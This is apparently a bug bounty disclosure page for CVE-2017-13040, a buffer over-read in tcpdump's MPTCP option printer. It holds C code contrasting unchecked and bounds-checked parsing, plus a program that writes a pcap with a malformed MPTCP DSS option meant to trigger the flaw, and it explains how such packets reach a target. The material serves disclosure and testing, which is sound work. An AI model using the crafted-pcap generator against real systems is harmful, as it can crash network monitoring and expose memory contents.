hackerone / karas / H1:964582

Internet Bug Bounty: CVE-2017-13040 The MPTCP parser in tcpdump before 4.9.2 has a buffer over-read in print-mptcp.c, several functions.

2020-08-22 06:09:22
karas
hackerone.com
$500
15

CVSS3: 9.8 High
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH

CVSS2: 7.5 High
AV:N/AC:L/Au:N/C:P/I:P/A:P
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: PARTIAL

EPSS: 0.009 Low (percentile 79.9%)

Description:

Versions of tcpdump before 4.9.2 are vulnerable to a buffer over-read (a read past the end of the captured packet data) in print-mptcp.c, the printer for the MPTCP (Multipath TCP, TCP option kind 30) option. The issue was reported to the tcpdump maintainers, fixed in version 4.9.2 and assigned CVE-2017-13040.

Patch: https://github.com/the-tcpdump-group/tcpdump/commit/4c3aee4bb0294c232d56b6d34e9eeb74f630fe8c
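Illustration of the bug class, added here as example code that is not tcpdump's print-mptcp.c and does not reproduce the exact faulty function: a walker for the MPTCP DSS subtype that trusts the option's flag bits and reads every field they announce, beside a version that first checks the option length against both the captured bytes and the flag-implied size. Flag bits and field layout follow RFC 6824 section 3.3; the constant names, function names and byte patterns are assumptions made for this example.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not tcpdump's code: an MPTCP DSS option walker written the
 * unchecked way, beside the bounds-checked version. Layout and flag bits
 * follow RFC 6824 section 3.3; every byte pattern below is constructed. */
#define MPTCP_KIND    30
#define MPTCP_SUB_DSS 2
#define DSS_m 0x08 /* DSN is 8 bytes instead of 4 */
#define DSS_M 0x04 /* DSN, subflow sequence number, data-level length present */
#define DSS_a 0x02 /* Data ACK is 8 bytes instead of 4 */
#define DSS_A 0x01 /* Data ACK present */

struct dss { uint8_t flags; uint64_t data_ack, dsn; uint32_t ssn; uint16_t dll; };

static uint64_t get_be(const uint8_t *p, size_t n)
{
    uint64_t v = 0;
    while (n--) v = (v << 8) | *p++;
    return v;
}

/* Option length the flags imply (a negotiated checksum would add 2 more). */
static size_t dss_expected_len(uint8_t flags)
{
    size_t len = 4; /* kind, length, subtype/reserved, flags */
    if (flags & DSS_A) len += (flags & DSS_a) ? 8 : 4;
    if (flags & DSS_M) len += ((flags & DSS_m) ? 8 : 4) + 4 + 2;
    return len;
}

/* Unchecked walk: trusts the flags and reads whatever the announced fields
 * need, regardless of the option's length byte or of how much was captured. */
int dss_parse_unchecked(const uint8_t *opt, struct dss *out)
{
    const uint8_t *p = opt + 4;
    size_t n;
    memset(out, 0, sizeof *out);
    out->flags = opt[3];
    if (out->flags & DSS_A) {
        n = (out->flags & DSS_a) ? 8 : 4;
        out->data_ack = get_be(p, n); p += n;
    }
    if (out->flags & DSS_M) {
        n = (out->flags & DSS_m) ? 8 : 4;
        out->dsn = get_be(p, n);           p += n;
        out->ssn = (uint32_t)get_be(p, 4); p += 4;
        out->dll = (uint16_t)get_be(p, 2);
    }
    return 0;
}

/* Checked walk: the option must lie inside the captured bytes and its length
 * byte must cover every field the flags announce, before anything is read. */
int dss_parse_checked(const uint8_t *opt, size_t avail, struct dss *out)
{
    size_t opt_len;
    if (avail < 4 || opt[0] != MPTCP_KIND || (opt[2] >> 4) != MPTCP_SUB_DSS) return -1;
    opt_len = opt[1];
    if (opt_len < 4 || opt_len > avail) return -1;      /* truncated by the capture */
    if (opt_len < dss_expected_len(opt[3])) return -1;  /* flags promise more than length holds */
    return dss_parse_unchecked(opt, out);               /* every read now stays within opt_len */
}

/* Constructed malformed option: length 4, flags A|a|M|m, which imply 26 bytes. */
static const uint8_t bad_dss[4] = { MPTCP_KIND, 4, MPTCP_SUB_DSS << 4, DSS_A | DSS_a | DSS_M | DSS_m };

/* bad_dss at the start of a 40-byte buffer; the 0xAA filler stands in for whatever follows the packet in memory. */
static void fill_bad(uint8_t buf[40]) { memset(buf, 0xAA, 40); memcpy(buf, bad_dss, 4); }

/* The unchecked walk's "Data ACK" is made of filler, not option data: neighbouring memory copied into output. */
uint64_t unchecked_leaks_neighbour_bytes(void)
{
    uint8_t buf[40]; struct dss d;
    fill_bad(buf);
    dss_parse_unchecked(buf, &d);
    return d.data_ack; /* 0xAAAAAAAAAAAAAAAA */
}

int checked_rejects_bad_dss(void)
{
    uint8_t buf[40]; struct dss d;
    fill_bad(buf);
    return dss_parse_checked(buf, sizeof buf, &d); /* -1 */
}

/* A well-formed 18-byte DSS (4-byte Data ACK and DSN) still parses. */
uint64_t checked_accepts_good_dss(void)
{
    static const uint8_t good[18] = { MPTCP_KIND, 18, MPTCP_SUB_DSS << 4, DSS_A | DSS_M,
        0x11, 0x22, 0x33, 0x44, 0, 0, 0x10, 0, 0, 0, 0, 1, 0, 0x64 }; /* ack, dsn, ssn, dll */
    struct dss d;
    return dss_parse_checked(good, sizeof good, &d) == 0 ? d.data_ack : 0; /* 0x11223344 */
}

int main(void)
{
    printf("unchecked Data ACK: 0x%016llx  checked result: %d\n",
           (unsigned long long)unchecked_leaks_neighbour_bytes(), checked_rejects_bad_dss());
    return 0;
}
```

The unchecked walk returns a Data ACK assembled from the 0xAA filler; in a real capture those bytes would be whatever sits after the packet in the capture buffer, printed to stdout as if they were option fields, or a fault if the read crosses into an unmapped page. The checked version refuses the same option and still accepts the well-formed 18-byte one, which is the property a fix has to preserve.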

This vulnerability can be exploited in two ways. The first is to produce a .pcap file containing crafted packet(s) for the affected protocol and have the target system decode it with tcpdump (for example with -r). The second is to send crafted packet(s) onto a network segment where the target system is running tcpdump on a live capture. Whether the packets in the second case must originate on the local segment or can come from a remote Internet host depends on the protocol. MPTCP is carried as a TCP option (kind 30) inside ordinary IP packets, so such segments route like any other TCP traffic and can be sent from any host whose packets reach the capture interface, although middleboxes that strip unknown TCP options can get in the way.
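The first delivery path, as an added example (written for this page, not from the report): a small C program that writes a one-packet pcap in which a TCP SYN carries a constructed MPTCP DSS option of length 4 with every flag bit set, for decoding with tcpdump -r. The addresses, ports and MAC addresses are arbitrary and the record timestamp is zero. The report does not state which byte pattern triggers the over-read, so this file is a harness input rather than a proven trigger; the check is to run an AddressSanitizer build of an unpatched release (4.9.1 or earlier) and of 4.9.2 against it.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not tcpdump's code: emit a one-packet pcap whose TCP header
 * carries a constructed, malformed MPTCP DSS option, for `tcpdump -r`. */
enum {
    ETH_LEN = 14, IP_LEN = 20, TCP_LEN = 24,   /* 20-byte TCP header + 4 option bytes */
    FRAME_LEN = ETH_LEN + IP_LEN + TCP_LEN,
    PCAP_LEN = 24 + 16 + FRAME_LEN              /* global header + record header + frame */
};

/* kind 30 (MPTCP), length 4, subtype 2 (DSS), flags F|m|M|a|A: the flags announce
 * Data ACK, DSN, SSN and DLL fields that a 4-byte option cannot hold. */
static const uint8_t bad_dss[4] = { 30, 4, 0x20, 0x1f };

static void put16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)(v >> 8); p[1] = (uint8_t)v; }
static void put32(uint8_t *p, uint32_t v) { put16(p, (uint16_t)(v >> 16)); put16(p + 2, (uint16_t)v); }
static void put32le(uint8_t *p, uint32_t v) { for (int i = 0; i < 4; i++) p[i] = (uint8_t)(v >> (8 * i)); }

/* Internet checksum helpers: sum16 accumulates 16-bit words, fold finishes and complements. */
static uint32_t sum16(const uint8_t *p, size_t n)
{
    uint32_t s = 0;
    for (size_t i = 0; i + 1 < n; i += 2) s += ((uint32_t)p[i] << 8) | p[i + 1];
    if (n & 1) s += (uint32_t)p[n - 1] << 8;
    return s;
}
static uint16_t fold(uint32_t s)
{
    while (s >> 16) s = (s & 0xffff) + (s >> 16);
    return (uint16_t)~s;
}

uint8_t pcap_buf[PCAP_LEN];

/* Fills out[0..PCAP_LEN) and returns PCAP_LEN, or 0 if cap is too small. */
size_t build_pcap(uint8_t *out, size_t cap)
{
    static const uint8_t macs[12] = { 2,0,0,0,0,1, 2,0,0,0,0,2 }; /* dst, src (locally administered) */
    static const uint8_t addrs[8] = { 10,0,0,1, 10,0,0,2 };         /* src, dst */
    uint8_t *gh, *rh, *eth, *ip, *tcp;
    if (cap < PCAP_LEN) return 0;
    memset(out, 0, PCAP_LEN);
    gh = out; rh = out + 24; eth = out + 40; ip = eth + ETH_LEN; tcp = ip + IP_LEN;

    /* pcap global header: little-endian magic, version 2.4, snaplen 65535, LINKTYPE_ETHERNET (1) */
    put32le(gh, 0xa1b2c3d4); gh[4] = 2; gh[6] = 4;
    put32le(gh + 16, 65535); put32le(gh + 20, 1);
    /* record header: ts_sec = ts_usec = 0, incl_len = orig_len = FRAME_LEN */
    put32le(rh + 8, FRAME_LEN); put32le(rh + 12, FRAME_LEN);

    /* Ethernet II, EtherType IPv4 */
    memcpy(eth, macs, 12); put16(eth + 12, 0x0800);

    /* IPv4: version 4, IHL 5, total length, TTL 64, protocol TCP, header checksum */
    ip[0] = 0x45; put16(ip + 2, IP_LEN + TCP_LEN); ip[8] = 64; ip[9] = 6;
    memcpy(ip + 12, addrs, 8);
    put16(ip + 10, fold(sum16(ip, IP_LEN)));

    /* TCP: 40000 -> 80, seq 1, data offset 6 words, SYN, window 65535, then the option */
    put16(tcp, 40000); put16(tcp + 2, 80); put32(tcp + 4, 1);
    tcp[12] = 6 << 4; tcp[13] = 0x02; put16(tcp + 14, 65535);
    memcpy(tcp + 20, bad_dss, sizeof bad_dss);
    /* checksum over the IPv4 pseudo-header (addresses, protocol, TCP length) plus the segment */
    put16(tcp + 16, fold(sum16(ip + 12, 8) + 6 + TCP_LEN + sum16(tcp, TCP_LEN)));
    return PCAP_LEN;
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "mptcp-bad-dss.pcap";
    size_t n = build_pcap(pcap_buf, sizeof pcap_buf);
    FILE *f = fopen(path, "wb");
    if (!f || fwrite(pcap_buf, 1, n, f) != n) { perror(path); return 1; }
    fclose(f);
    printf("wrote %zu bytes to %s; decode with: tcpdump -nvvv -r %s\n", n, path, path);
    return 0;
}
```

Both checksums are computed so that the decoder has no other reason to reject the packet; with -vvv tcpdump prints the TCP options, which is where the MPTCP printer runs. The same frame, minus the pcap headers, is what the second delivery path would put on the wire.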

Impact

tcpdump normally runs as root or with CAP_NET_RAW, and by design it decodes data from untrusted network hosts, so a parser bug in it is a security issue regardless of any other exposure. Because this bug is an over-read rather than an overwrite, its realistic consequences are a crash of the capturing process (a denial of service that also ends the capture and so blinds whatever monitoring depends on it) and disclosure of bytes lying beyond the packet in the capture buffer, which appear in the decoded output as if they were option fields. An over-read alone gives the attacker no write primitive and no way to inject code into the process; the CVSS vectors shown above rate the CVE at its worst case, and the practical severity depends on how tcpdump is deployed, for instance whether it drops privileges (-Z) and whether its output is visible to the attacker.
